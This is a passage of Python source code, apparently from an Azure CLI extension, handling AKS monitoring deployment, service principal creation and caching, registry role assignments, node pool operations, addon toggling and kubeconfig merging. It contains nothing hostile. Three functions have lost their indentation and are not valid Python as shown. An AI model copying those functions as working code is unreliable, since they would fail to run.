                "resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
                "properties": {
                    "mode": "Incremental",
                    "template": {
                        "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
                        "contentVersion": "1.0.0.0",
                        "parameters": {},
                        "variables": {},
                        "resources": [
                            {
                                "apiVersion": "2015-11-01-preview",
                                "type": "Microsoft.OperationsManagement/solutions",
                                "location": "[parameters('workspaceRegion')]",
                                "name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
                                "properties": {
                                    "workspaceResourceId": "[parameters('workspaceResourceId')]"
                                },
                                "plan": {
                                    "name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
                                    "product": "[Concat('OMSGallery/', 'ContainerInsights')]",
                                    "promotionCode": "",
                                    "publisher": "Microsoft"
                                }
                            }
                        ]
                    },
                    "parameters": {}
                }
            }
        ]
    }
    params = {
        "workspaceResourceId": {
            "value": workspace_resource_id
        },
        "workspaceRegion": {
            "value": location
        },
        "solutionDeploymentName": {
            "value": solution_deployment_name
        }
    }
    deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
    # publish the Container Insights solution to the Log Analytics workspace
    return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
                              validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_service_principal(cli_ctx,
                                  service_principal=None,
                                  client_secret=None,
                                  subscription_id=None,
                                  dns_name_prefix=None,
                                  location=None,
                                  name=None):
    """Resolve (load, validate, or create) the service principal used by an
    AKS cluster, caching the result in 'aksServicePrincipal.json'.

    Resolution order: explicit --service-principal (requires --client-secret),
    then the on-disk cache, then creation of a brand-new SP.

    :return: the credential dict loaded back from the local cache file.
    :raises CLIError: when SP creation fails, or when --service-principal is
        given without --client-secret.
    """
    file_name_aks = 'aksServicePrincipal.json'
    # TODO: This really needs to be unit tested.
    rbac_client = get_graph_rbac_management_client(cli_ctx)
    if not service_principal:
        # --service-principal not specified, try to load it from local disk
        principal_obj = load_acs_service_principal(subscription_id, file_name=file_name_aks)
        if principal_obj:
            service_principal = principal_obj.get('service_principal')
            client_secret = principal_obj.get('client_secret')
        else:
            # Nothing to load, make one.
            if not client_secret:
                client_secret = _create_client_secret()
            # random salt makes the SP's homepage URL unique per creation
            salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
            url = 'http://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
            service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
            if not service_principal:
                raise CLIError('Could not create a service principal with the right permissions. '
                               'Are you an Owner on this project?')
            logger.info('Created a service principal: %s', service_principal)
            # We don't need to add role assignment for this created SPN
    else:
        # --service-principal specfied, validate --client-secret was too
        if not client_secret:
            raise CLIError('--client-secret is required if --service-principal is specified')
    # persist whatever we resolved so subsequent invocations can reuse it
    store_acs_service_principal(subscription_id, client_secret, service_principal, file_name=file_name_aks)
    return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
    """Return the Azure location of the given resource group.

    The GET call doubles as an existence check: it raises if the
    resource group does not exist.
    """
    rg_client = cf_resource_groups(ctx, subscription_id=subscription_id)
    resource_group = rg_client.get(resource_group_name)
    return resource_group.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError('node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError('min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _create_client_secret():
# Add a special character to satsify AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _ensure_aks_acr(cli_ctx,
                    client_id,
                    acr_name_or_id,
                    subscription_id,  # pylint: disable=unused-argument
                    detach=False):
    """Resolve an ACR by resource ID or name and grant (or revoke, when
    detach=True) the 'acrpull' role to *client_id* on it.

    :param acr_name_or_id: either a full ACR resource ID or a bare registry name.
    :raises CLIError: when the registry cannot be found or accessed.
    """
    from msrestazure.tools import is_valid_resource_id, parse_resource_id
    # Check if the ACR exists by resource ID.
    if is_valid_resource_id(acr_name_or_id):
        try:
            parsed_registry = parse_resource_id(acr_name_or_id)
            acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed_registry['subscription'])
            registry = acr_client.registries.get(parsed_registry['resource_group'], parsed_registry['name'])
        except CloudError as ex:
            raise CLIError(ex.message)
        _ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
        return
    # Check if the ACR exists by name accross all resource groups.
    registry_name = acr_name_or_id
    registry_resource = 'Microsoft.ContainerRegistry/registries'
    try:
        registry = get_resource_by_name(cli_ctx, registry_name, registry_resource)
    except CloudError as ex:
        # surface a friendlier message for the common "no such registry" case
        if 'was not found' in ex.message:
            raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(registry_name))
        raise CLIError(ex.message)
    _ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
    return
def _ensure_aks_acr_role_assignment(cli_ctx,
                                    client_id,
                                    registry_id,
                                    detach=False):
    """Grant the 'acrpull' role on *registry_id* to *client_id*, or revoke
    it when detach=True.

    :raises CLIError: when the role assignment cannot be created/deleted.
    """
    if detach:
        deleted = _delete_role_assignments(cli_ctx,
                                           'acrpull',
                                           client_id,
                                           scope=registry_id)
        if not deleted:
            raise CLIError('Could not delete role assignments for ACR. '
                           'Are you an Owner on this subscription?')
        return

    added = _add_role_assignment(cli_ctx,
                                 'acrpull',
                                 client_id,
                                 scope=registry_id)
    if not added:
        raise CLIError('Could not create a role assignment for ACR. '
                       'Are you an Owner on this subscription?')
def _add_virtual_node_role_assignment(cmd, result, vnet_subnet_id):
    """Grant the virtual-node addon identity Contributor on the cluster VNet.

    Prefers the cluster's service principal when one exists (client_id not
    'msi'); otherwise falls back to the addon's user-assigned MSI. Failures
    are logged as warnings only — role assignment here is best-effort.

    :param result: managed cluster object returned by create/update.
    :param vnet_subnet_id: subnet resource ID of an agent pool; trimmed to
        the VNet ID because permission is granted at VNet scope.
    """
    # Remove trailing "/subnets/<SUBNET_NAME>" to get the vnet id
    vnet_id = vnet_subnet_id.rpartition('/')[0]
    vnet_id = vnet_id.rpartition('/')[0]

    service_principal_msi_id = None
    is_service_principal = False
    os_type = 'Linux'
    addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
    # Check if service principal exists, if it does, assign permissions to service principal
    # Else, provide permissions to MSI
    if (
            hasattr(result, 'service_principal_profile') and
            hasattr(result.service_principal_profile, 'client_id') and
            result.service_principal_profile.client_id.lower() != 'msi'
    ):
        logger.info('valid service principal exists, using it')
        service_principal_msi_id = result.service_principal_profile.client_id
        is_service_principal = True
    elif (
            (hasattr(result, 'addon_profiles')) and
            (addon_name in result.addon_profiles) and
            (hasattr(result.addon_profiles[addon_name], 'identity')) and
            (hasattr(result.addon_profiles[addon_name].identity, 'object_id'))
    ):
        logger.info('virtual node MSI exists, using it')
        service_principal_msi_id = result.addon_profiles[addon_name].identity.object_id
        is_service_principal = False

    if service_principal_msi_id is not None:
        if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
                                    service_principal_msi_id, is_service_principal, scope=vnet_id):
            logger.warning('Could not create a role assignment for virtual node addon. '
                           'Are you an Owner on this subscription?')
    else:
        # Fix: the original implicit string concatenation was missing a space
        # and rendered as "...for roleassignment".
        logger.warning('Could not find service principal or user assigned MSI for role '
                       'assignment')
def aks_agentpool_show(cmd,   # pylint: disable=unused-argument
                       client,
                       resource_group_name,
                       cluster_name,
                       nodepool_name):
    """Fetch a single agent pool (node pool) of a managed cluster."""
    return client.get(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_list(cmd,   # pylint: disable=unused-argument
                       client,
                       resource_group_name,
                       cluster_name):
    """List all agent pools (node pools) of a managed cluster."""
    return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd,      # pylint: disable=unused-argument,too-many-locals
                      client,
                      resource_group_name,
                      cluster_name,
                      nodepool_name,
                      tags=None,
                      kubernetes_version=None,
                      node_zones=None,
                      enable_node_public_ip=False,
                      node_vm_size=None,
                      node_osdisk_type=None,
                      node_osdisk_size=0,
                      node_count=3,
                      vnet_subnet_id=None,
                      pod_subnet_id=None,
                      ppg=None,
                      max_pods=0,
                      os_type="Linux",
                      min_count=None,
                      max_count=None,
                      enable_cluster_autoscaler=False,
                      node_taints=None,
                      priority=CONST_SCALE_SET_PRIORITY_REGULAR,
                      eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
                      spot_max_price=float('nan'),
                      labels=None,
                      max_surge=None,
                      mode="User",
                      aks_custom_headers=None,
                      kubelet_config=None,
                      linux_os_config=None,
                      enable_encryption_at_host=False,
                      no_wait=False):
    """Add a new agent pool (node pool) to an existing managed cluster.

    Builds an AgentPool model from the CLI options and submits a
    create_or_update. Fails fast when a pool with the same name already
    exists. Returns the (possibly polled) SDK operation result.
    """
    instances = client.list(resource_group_name, cluster_name)
    for agentpool_profile in instances:
        if agentpool_profile.name == nodepool_name:
            raise CLIError("Node pool {} already exists, please try a different name, "
                           "use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
    upgradeSettings = AgentPoolUpgradeSettings()
    taints_array = []
    # taints come in as a comma-separated "key=value:Effect" list
    if node_taints is not None:
        for taint in node_taints.split(','):
            try:
                taint = taint.strip()
                taints_array.append(taint)
            except ValueError:
                raise CLIError('Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
    # pick a platform-appropriate default VM size when none was requested
    if node_vm_size is None:
        if os_type == "Windows":
            node_vm_size = "Standard_D2s_v3"
        else:
            node_vm_size = "Standard_DS2_v2"
    if max_surge:
        upgradeSettings.max_surge = max_surge
    agent_pool = AgentPool(
        name=nodepool_name,
        tags=tags,
        node_labels=labels,
        count=int(node_count),
        vm_size=node_vm_size,
        os_type=os_type,
        storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
        vnet_subnet_id=vnet_subnet_id,
        pod_subnet_id=pod_subnet_id,
        proximity_placement_group_id=ppg,
        agent_pool_type="VirtualMachineScaleSets",
        max_pods=int(max_pods) if max_pods else None,
        orchestrator_version=kubernetes_version,
        availability_zones=node_zones,
        enable_node_public_ip=enable_node_public_ip,
        node_taints=taints_array,
        scale_set_priority=priority,
        upgrade_settings=upgradeSettings,
        enable_encryption_at_host=enable_encryption_at_host,
        mode=mode
    )
    # eviction policy / max price only apply to Spot pools; NaN means "pay up to on-demand price" (-1)
    if priority == CONST_SCALE_SET_PRIORITY_SPOT:
        agent_pool.scale_set_eviction_policy = eviction_policy
        if isnan(spot_max_price):
            spot_max_price = -1
        agent_pool.spot_max_price = spot_max_price
    _check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
    if node_osdisk_size:
        agent_pool.os_disk_size_gb = int(node_osdisk_size)
    if node_osdisk_type:
        agent_pool.os_disk_type = node_osdisk_type
    if kubelet_config:
        agent_pool.kubelet_config = _get_kubelet_config(kubelet_config)
    if linux_os_config:
        agent_pool.linux_os_config = _get_linux_os_config(linux_os_config)
    headers = get_aks_custom_headers(aks_custom_headers)
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool, custom_headers=headers)
def aks_agentpool_scale(cmd,    # pylint: disable=unused-argument
                        client,
                        resource_group_name,
                        cluster_name,
                        nodepool_name,
                        node_count=3,
                        no_wait=False):
    """Scale a node pool to an explicit node count.

    Rejects pools that are managed by the cluster autoscaler, and no-op
    scales to the current count.
    """
    instance = client.get(resource_group_name, cluster_name, nodepool_name)
    target_count = int(node_count)
    if instance.enable_auto_scaling:
        raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
    if target_count == instance.count:
        raise CLIError("The new node count is the same as the current node count.")
    instance.count = target_count  # pylint: disable=no-member
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd,  # pylint: disable=unused-argument
                          client,
                          resource_group_name,
                          cluster_name,
                          nodepool_name,
                          kubernetes_version='',
                          no_wait=False,
                          node_image_only=False,
                          max_surge=None):
    """Upgrade a node pool's Kubernetes version, or only its node image.

    --kubernetes-version and --node-image-only are mutually exclusive: a
    Kubernetes upgrade already implies a node image upgrade.
    """
    if kubernetes_version != '' and node_image_only:
        # Fix: the original implicit string concatenation was missing a space
        # and rendered as "...node image version.If you only want...".
        raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
                       'If you only want to upgrade the node version please use the "--node-image-only" option only.')
    if node_image_only:
        return _upgrade_single_nodepool_image_version(no_wait,
                                                      client,
                                                      resource_group_name,
                                                      cluster_name,
                                                      nodepool_name)
    instance = client.get(resource_group_name, cluster_name, nodepool_name)
    instance.orchestrator_version = kubernetes_version
    if not instance.upgrade_settings:
        instance.upgrade_settings = AgentPoolUpgradeSettings()
    if max_surge:
        instance.upgrade_settings.max_surge = max_surge
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_get_upgrade_profile(cmd,  # pylint: disable=unused-argument
                                      client,
                                      resource_group_name,
                                      cluster_name,
                                      nodepool_name):
    """Return the upgrade profile (available versions) for a node pool."""
    return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_update(cmd,   # pylint: disable=unused-argument
                         client,
                         resource_group_name,
                         cluster_name,
                         nodepool_name,
                         tags=None,
                         enable_cluster_autoscaler=False,
                         disable_cluster_autoscaler=False,
                         update_cluster_autoscaler=False,
                         min_count=None, max_count=None,
                         max_surge=None,
                         mode=None,
                         no_wait=False):
    """Update autoscaler settings, tags, mode, or max-surge on a node pool.

    Exactly one of the three autoscaler flags may be set per invocation
    (unless only tags/mode/max-surge are being updated). Returns None when
    the request is a no-op (autoscaler already in the requested state).
    """
    # booleans summed: exactly one autoscaler action is allowed at a time
    update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
    if (update_autoscaler != 1 and not tags and not mode and not max_surge):
        raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
                       '"--disable-cluster-autoscaler" or '
                       '"--update-cluster-autoscaler" or '
                       '"--tags" or "--mode" or "--max-surge"')
    instance = client.get(resource_group_name, cluster_name, nodepool_name)
    if min_count is None or max_count is None:
        if enable_cluster_autoscaler or update_cluster_autoscaler:
            raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
                           '--update-cluster-autoscaler set.')
    if min_count is not None and max_count is not None:
        if int(min_count) > int(max_count):
            raise CLIError('value of min-count should be less than or equal to value of max-count.')
    if enable_cluster_autoscaler:
        if instance.enable_auto_scaling:
            # already on: warn and bail out without calling the service
            logger.warning('Autoscaler is already enabled for this node pool.\n'
                           'Please run "az aks nodepool update --update-cluster-autoscaler" '
                           'if you want to update min-count or max-count.')
            return None
        instance.min_count = int(min_count)
        instance.max_count = int(max_count)
        instance.enable_auto_scaling = True
    if update_cluster_autoscaler:
        if not instance.enable_auto_scaling:
            raise CLIError('Autoscaler is not enabled for this node pool.\n'
                           'Run "az aks nodepool update --enable-cluster-autoscaler" '
                           'to enable cluster with min-count and max-count.')
        instance.min_count = int(min_count)
        instance.max_count = int(max_count)
    if not instance.upgrade_settings:
        instance.upgrade_settings = AgentPoolUpgradeSettings()
    if max_surge:
        instance.upgrade_settings.max_surge = max_surge
    if disable_cluster_autoscaler:
        if not instance.enable_auto_scaling:
            logger.warning('Autoscaler is already disabled for this node pool.')
            return None
        # turning the autoscaler off also clears the min/max bounds
        instance.enable_auto_scaling = False
        instance.min_count = None
        instance.max_count = None
    instance.tags = tags
    if mode is not None:
        instance.mode = mode
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd,   # pylint: disable=unused-argument
                         client,
                         resource_group_name,
                         cluster_name,
                         nodepool_name,
                         no_wait=False):
    """Delete a node pool after verifying it exists (case-insensitive match)."""
    wanted = nodepool_name.lower()
    agentpool_exists = any(
        pool.name.lower() == wanted
        for pool in client.list(resource_group_name, cluster_name)
    )
    if not agentpool_exists:
        raise CLIError("Node pool {} doesnt exist, "
                       "use 'aks nodepool list' to get current node pool list".format(nodepool_name))
    return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
    """Disable the given comma-separated addons on a managed cluster."""
    subscription_id = get_subscription_id(cmd.cli_ctx)
    current = client.get(resource_group_name, name)
    updated = _update_addons(
        cmd,
        current,
        subscription_id,
        resource_group_name,
        name,
        addons,
        enable=False,
        no_wait=no_wait
    )
    # push the modified addon profiles back to the service
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, updated)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
                      subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None, appgw_subnet_id=None,
                      appgw_watch_namespace=None, enable_sgxquotehelper=False, no_wait=False):
    """Enable the given comma-separated addons on a managed cluster.

    For addons that need post-creation role assignments (monitoring,
    ingress-appgw, virtual-node) the create_or_update is awaited so the
    result can be used for the assignments; otherwise the operation is
    dispatched honoring --no-wait.
    """
    instance = client.get(resource_group_name, name)
    subscription_id = get_subscription_id(cmd.cli_ctx)
    instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
                              workspace_resource_id=workspace_resource_id, subnet_name=subnet_name,
                              appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_watch_namespace=appgw_watch_namespace,
                              enable_sgxquotehelper=enable_sgxquotehelper, no_wait=no_wait)
    # monitoring needs the ContainerInsights solution installed in the workspace
    if CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled:
        _ensure_container_insights_for_monitoring(cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME])
    monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
    ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
    os_type = 'Linux'
    enable_virtual_node = False
    if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in instance.addon_profiles:
        enable_virtual_node = True
    need_post_creation_role_assignment = monitoring or ingress_appgw_addon_enabled or enable_virtual_node
    if need_post_creation_role_assignment:
        # adding a wait here since we rely on the result for role assignment
        result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(resource_group_name, name, instance))
        cloud_name = cmd.cli_ctx.cloud.name
        # mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
        if monitoring and cloud_name.lower() == 'azurecloud':
            from msrestazure.tools import resource_id
            cluster_resource_id = resource_id(
                subscription=subscription_id,
                resource_group=resource_group_name,
                namespace='Microsoft.ContainerService', type='managedClusters',
                name=name
            )
            _add_monitoring_role_assignment(result, cluster_resource_id, cmd)
        if ingress_appgw_addon_enabled:
            _add_ingress_appgw_addon_role_assignment(result, cmd)
        if enable_virtual_node:
            # All agent pool will reside in the same vnet, we will grant vnet level Contributor role
            # in later function, so using a random agent pool here is OK
            random_agent_pool = result.agent_pool_profiles[0]
            if random_agent_pool.vnet_subnet_id != "":
                _add_virtual_node_role_assignment(cmd, result, random_agent_pool.vnet_subnet_id)
            # Else, the cluster is not using custom VNet, the permission is already granted in AKS RP,
            # we don't need to handle it in client side in this case.
    else:
        result = sdk_no_wait(no_wait, client.create_or_update,
                             resource_group_name, name, instance)
    return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):     # pylint: disable=unused-argument
    """Rotate the certificates and keys of a managed cluster (long-running)."""
    return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd,  # pylint: disable=too-many-branches,too-many-statements
                   instance,
                   subscription_id,
                   resource_group_name,
                   name,
                   addons,
                   enable,
                   workspace_resource_id=None,
                   subnet_name=None,
                   appgw_name=None,
                   appgw_subnet_prefix=None,
                   appgw_subnet_cidr=None,
                   appgw_id=None,
                   appgw_subnet_id=None,
                   appgw_watch_namespace=None,
                   enable_sgxquotehelper=False,
                   no_wait=False):  # pylint: disable=unused-argument
    """Enable or disable addon profiles on an in-memory managed cluster.

    Mutates and returns *instance*: its addon_profiles are updated for each
    addon named in the comma-separated *addons* string, with addon-specific
    config (monitoring workspace, virtual-node subnet, appgw settings,
    confcom SGX helper). SP and AAD profiles are nulled out so the
    subsequent PUT passes validation.

    :raises CLIError: on unknown addon names, re-enabling an already enabled
        addon, or disabling an addon that is not installed.
    """
    # parse the comma-separated addons argument
    addon_args = addons.split(',')
    addon_profiles = instance.addon_profiles or {}
    os_type = 'Linux'
    # for each addons argument
    for addon_arg in addon_args:
        if addon_arg not in ADDONS:
            raise CLIError("Invalid addon name: {}.".format(addon_arg))
        addon = ADDONS[addon_arg]
        if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
            # only linux is supported for now, in the future this will be a user flag
            addon += os_type
        # honor addon names defined in Azure CLI
        for key in list(addon_profiles):
            if key.lower() == addon.lower() and key != addon:
                addon_profiles[addon] = addon_profiles.pop(key)
        if enable:
            # add new addons or update existing ones and enable them
            addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
            # special config handling for certain addons
            if addon == CONST_MONITORING_ADDON_NAME:
                if addon_profile.enabled:
                    raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
                                   'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
                                   'before enabling it again.')
                # default workspace is created on demand when none was given
                if not workspace_resource_id:
                    workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
                        cmd,
                        subscription_id,
                        resource_group_name)
                workspace_resource_id = workspace_resource_id.strip()
                if not workspace_resource_id.startswith('/'):
                    workspace_resource_id = '/' + workspace_resource_id
                if workspace_resource_id.endswith('/'):
                    workspace_resource_id = workspace_resource_id.rstrip('/')
                addon_profile.config = {CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id}
            elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
                if addon_profile.enabled:
                    raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
                                   'To change virtual-node configuration, run '
                                   '"az aks disable-addons -a virtual-node -g {resource_group_name}" '
                                   'before enabling it again.')
                if not subnet_name:
                    raise CLIError('The aci-connector addon requires setting a subnet name.')
                addon_profile.config = {CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
            elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
                if addon_profile.enabled:
                    raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
                                   'To change ingress-appgw configuration, run '
                                   f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
                                   'before enabling it again.')
                # start from a fresh profile; only explicitly passed options are set
                addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
                if appgw_name is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
                if appgw_subnet_prefix is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
                if appgw_subnet_cidr is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
                if appgw_id is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
                if appgw_subnet_id is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
                if appgw_watch_namespace is not None:
                    addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
            elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
                if addon_profile.enabled:
                    raise CLIError('The open-service-mesh addon is already enabled for this managed cluster.\n'
                                   'To change open-service-mesh configuration, run '
                                   f'"az aks disable-addons -a open-service-mesh -n {name} -g {resource_group_name}" '
                                   'before enabling it again.')
                addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
            elif addon == CONST_CONFCOM_ADDON_NAME:
                if addon_profile.enabled:
                    raise CLIError('The confcom addon is already enabled for this managed cluster.\n'
                                   'To change confcom configuration, run '
                                   f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
                                   'before enabling it again.')
                addon_profile = ManagedClusterAddonProfile(enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
                if enable_sgxquotehelper:
                    addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
            addon_profiles[addon] = addon_profile
        else:
            if addon not in addon_profiles:
                # kube-dashboard may be absent; disabling it is a no-op profile
                if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
                    addon_profiles[addon] = ManagedClusterAddonProfile(enabled=False)
                else:
                    raise CLIError("The addon {} is not installed.".format(addon))
            addon_profiles[addon].config = None
        addon_profiles[addon].enabled = enable
    instance.addon_profiles = addon_profiles
    # null out the SP and AAD profile because otherwise validation complains
    instance.service_principal_profile = None
    instance.aad_profile = None
    return instance
def aks_get_versions(cmd, client, location):    # pylint: disable=unused-argument
    """List orchestrator versions available to managed clusters in a region."""
    return client.list_orchestrators(location, resource_type='managedClusters')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
    """Merge an unencrypted kubeconfig into the file at the specified path, or print it to
    stdout if the path is "-".

    Creates the target directory and an owner-only (0600) empty config file
    when they do not exist, then merges via a temporary file that is always
    cleaned up.
    """
    # Special case for printing to stdout
    if path == "-":
        print(kubeconfig)
        return
    # ensure that at least an empty ~/.kube/config exists
    directory = os.path.dirname(path)
    if directory and not os.path.exists(directory):
        try:
            os.makedirs(directory)
        except OSError as ex:
            # a concurrent creation of the directory is fine; anything else is not
            if ex.errno != errno.EEXIST:
                raise
    if not os.path.exists(path):
        # create empty config with permissions restricted to the owner
        with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
            pass
    # merge the new kubeconfig into the existing one
    fd, temp_path = tempfile.mkstemp()
    additional_file = os.fdopen(fd, 'w+t')
    try:
        additional_file.write(kubeconfig)
        additional_file.flush()
        merge_kubernetes_configurations(path, temp_path, overwrite_existing, context_name)
    except yaml.YAMLError as ex:
        logger.warning('Failed to merge credentials to kube config file: %s', ex)
    finally:
        additional_file.close()
        os.remove(temp_path)
def _handle_merge(existing, addition, key, replace):
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
    """Load and parse a kubeconfig YAML file.

    :return: the parsed YAML document (may be None for an empty file).
    :raises CLIError: when the file does not exist or cannot be parsed.
    :raises OSError: for other I/O failures (e.g. permission denied).
    """
    try:
        with open(filename) as stream:
            return yaml.safe_load(stream)
    except (IOError, OSError) as ex:
        if getattr(ex, 'errno', 0) == errno.ENOENT:
            raise CLIError('{} does not exist'.format(filename))
        # Fix: previously any other I/O error (e.g. EACCES) was silently
        # swallowed and the function returned None; surface it instead.
        raise
    except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
        raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
    """Merge the kubeconfig in *addition_file* into *existing_file* on disk.

    When *context_name* is given, the added context/cluster entries are
    renamed to it. Admin contexts get an '-admin' suffix so they do not
    clobber the user context. Warns when the resulting file is not
    owner-only readable/writable (non-Windows).

    :raises CLIError: when the addition cannot be loaded, or a name
        conflict is declined by the user.
    """
    existing = load_kubernetes_configuration(existing_file)
    addition = load_kubernetes_configuration(addition_file)
    # Fix: validate 'addition' BEFORE dereferencing it. Previously this check
    # ran after the context renaming below, so a None addition crashed with a
    # TypeError instead of raising the intended friendly CLIError.
    if addition is None:
        raise CLIError('failed to load additional configuration from {}'.format(addition_file))
    if context_name is not None:
        addition['contexts'][0]['name'] = context_name
        addition['contexts'][0]['context']['cluster'] = context_name
        addition['clusters'][0]['name'] = context_name
        addition['current-context'] = context_name
    # rename the admin context so it doesn't overwrite the user context
    for ctx in addition.get('contexts', []):
        try:
            if ctx['context']['user'].startswith('clusterAdmin'):
                admin_name = ctx['name'] + '-admin'
                addition['current-context'] = ctx['name'] = admin_name
                break
        except (KeyError, TypeError):
            continue
    if existing is None:
        existing = addition
    else:
        _handle_merge(existing, addition, 'clusters', replace)
        _handle_merge(existing, addition, 'users', replace)
        _handle_merge(existing, addition, 'contexts', replace)
